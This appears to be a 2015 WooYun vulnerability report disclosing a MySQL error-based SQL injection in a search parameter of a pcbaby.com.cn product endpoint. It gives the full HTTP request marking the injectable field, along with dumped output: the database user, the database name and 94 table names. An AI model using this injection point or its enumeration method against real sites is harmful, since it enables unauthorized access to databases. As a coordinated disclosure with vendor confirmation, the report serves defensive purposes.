当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0121481

漏洞标题:太平洋亲子网某站点MySQL报错注入

相关厂商:太平洋亲子网

漏洞作者: 路人甲

提交时间:2015-06-18 21:18

修复时间:2015-08-03 10:18

公开时间:2015-08-03 10:18

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:8

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-06-18: 细节已通知厂商并且等待厂商处理中
2015-06-19: 厂商已经确认,细节仅向厂商公开
2015-06-29: 细节向核心白帽子及相关领域专家公开
2015-07-09: 细节向普通白帽子公开
2015-07-19: 细节向实习白帽子公开
2015-08-03: 细节向公众公开

简要描述:

太平洋亲子网某站点MySQL报错注入

详细说明:

GET /jsp/service/get_product_brand_json.jsp?cId=5&searchText=123*&status=0 HTTP/1.1
Cookie: JSESSIONID=abcQbegPgUbGAhGPTaf4u
Host: 360.pcbaby.com.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/600.1.3 (KHTML, like Gecko) Version/8.0 Mobile/12A4345d Safari/600.1.4
Accept: */*


searchText可注入。绑定的另一个域名应该是 http://product.pcbaby.com.cn/

漏洞证明:

current user:    'babylib2_app@%'
current database:    'babylib2'
Database: babylib2
[94 tables]
+-------------------------------------------+
| key_gen                                   |
| lib_article_basic                         |
| lib_article_relative_detail               |
| lib_article_relative_detail_201110270920  |
| lib_article_relative_summary              |
| lib_article_relative_summary_201110270920 |
| lib_article_view_count                    |
| lib_attribute                             |
| lib_attribute_option                      |
| lib_brand                                 |
| lib_brand_info                            |
| lib_brand_series                          |
| lib_category                              |
| lib_category_attribute                    |
| lib_category_bak20140625                  |
| lib_category_brand                        |
| lib_category_config                       |
| lib_category_emphasis_attribute           |
| lib_category_publish_index                |
| lib_catrgory_emphasis                     |
| lib_comment                               |
| lib_comment20111011                       |
| lib_comment_20110429                      |
| lib_comment_bak20140425                   |
| lib_comment_cnt_for_activity              |
| lib_comment_content                       |
| lib_comment_content_360                   |
| lib_comment_product                       |
| lib_comment_reply                         |
| lib_comment_reply_content                 |
| lib_comment_score                         |
| lib_comment_score_360                     |
| lib_comment_score_copy                    |
| lib_comment_user                          |
| lib_comment_user_360                      |
| lib_cooperation                           |
| lib_count_brand                           |
| lib_count_product                         |
| lib_criteria                              |
| lib_day_count_brand                       |
| lib_day_count_file                        |
| lib_day_count_product                     |
| lib_dealer                                |
| lib_dealer_price                          |
| lib_famous_old                            |
| lib_focus_img                             |
| lib_group                                 |
| lib_group_attribute                       |
| lib_group_brand                           |
| lib_impression                            |
| lib_operate_log                           |
| lib_pk_vote                               |
| lib_product_entity                        |
| lib_product_entity_20111111               |
| lib_product_entity_float                  |
| lib_product_entity_int                    |
| lib_product_entity_text                   |
| lib_product_entity_varchar                |
| lib_product_extend                        |
| lib_product_index                         |
| lib_product_index2                        |
| lib_product_index_build                   |
| lib_product_index_build2                  |
| lib_product_index_item_option_1           |
| lib_product_index_item_option_2           |
| lib_product_index_item_option_3           |
| lib_product_index_item_option_4           |
| lib_product_index_item_option_5           |
| lib_product_index_item_option_6           |
| lib_product_index_timeline                |
| lib_product_pic                           |
| lib_product_price_history                 |
| lib_product_purchase_href                 |
| lib_product_score                         |
| lib_product_score_20111111                |
| sec_acl                                   |
| sec_function                              |
| sec_role                                  |
| sec_role_function                         |
| spider_category                           |
| spider_comment                            |
| spider_product                            |
| temp_category_article                     |
| temp_category_brand                       |
| temp_sheen                                |
| tmp_20140425                              |
| tmp_20140425_1                            |
| tmp_20140425_2                            |
| tmp_20140425_3                            |
| tmp_20140425_4                            |
| tmp_20140425_5                            |
| tmp_brand_comment_info                    |
| yuanyuan_p_cnt                            |
| yuanyuan_p_cnt2                           |
+-------------------------------------------+

修复方案:

参数过滤

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-06-19 10:17

厂商回复:

谢谢路人甲对太平洋网络做出的贡献,我们会马上修复漏洞。

最新状态:

暂无